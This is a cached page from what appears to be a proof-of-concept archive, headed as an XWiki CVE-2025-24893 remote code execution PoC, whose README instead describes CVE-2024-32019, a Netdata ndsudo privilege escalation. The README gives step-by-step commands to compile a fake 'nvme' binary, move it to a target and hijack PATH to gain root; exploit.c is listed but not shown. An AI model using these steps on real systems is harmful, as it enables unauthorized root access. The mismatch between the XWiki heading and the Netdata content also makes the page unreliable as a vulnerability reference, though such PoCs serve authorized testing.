Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2025-24893 PoC — XWiki Platform 安全漏洞

Source
Associated Vulnerability
Title:XWiki Platform 安全漏洞 (CVE-2025-24893)
Description:XWiki Platform是XWiki开源的一套用于创建Web协作应用程序的Wiki平台。 XWiki Platform存在安全漏洞,该漏洞源于任何来宾用户都可以通过对SolrSearch的请求,造成远程代码执行。
Description
this is a poc for the CVE-2025-24893
Readme

# ⚠️ CVE-2024-32019 - PoC

## 📌 Affected Versions

- `>= v1.45.0`, `< v1.45.3`  
- `>= v1.44.0-60`, `< v1.45.0-169`

---

## 🛠️ Proof of Concept

**CVE-2024-32019** — `ndsudo` local privilege escalation via **untrusted search path**.

### 🔧 Compile the Exploit

```bash
x86_64-linux-gnu-gcc -o nvme exploit.c -static
```

### 📤 Deploy on Target Machine

1. **Transfer the compiled binary** to the vulnerable machine.
2. Make it executable:

   ```bash
   chmod +x nvme
   ```

3. Exploit the vulnerable binary via `PATH` manipulation (use the same path where you uploaded your binary):

   ```bash
   PATH=$(pwd):$PATH /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list
   ```

---

## 🔍 Reference

- [Netdata Security Advisory - GHSA-pmhq-4cxq-wj93](https://github.com/netdata/netdata/security/advisories/GHSA-pmhq-4cxq-wj93)

---

## ⚖️ Disclaimer and Terms

This Proof of Concept (PoC) code is provided for **educational and authorized penetration testing purposes only**.

- **No permission** is granted to modify, redistribute, or use this code for any other purposes.
- Unauthorized use or modification may be **illegal and unethical**.
- The authors take **no responsibility** for any misuse or damages.
File Snapshot

[4.0K] /data/pocs/5d75bd086b37147f80fd4161b39c948b116317f7 ├── [ 239] exploit.c └── [1.2K] README.md 0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.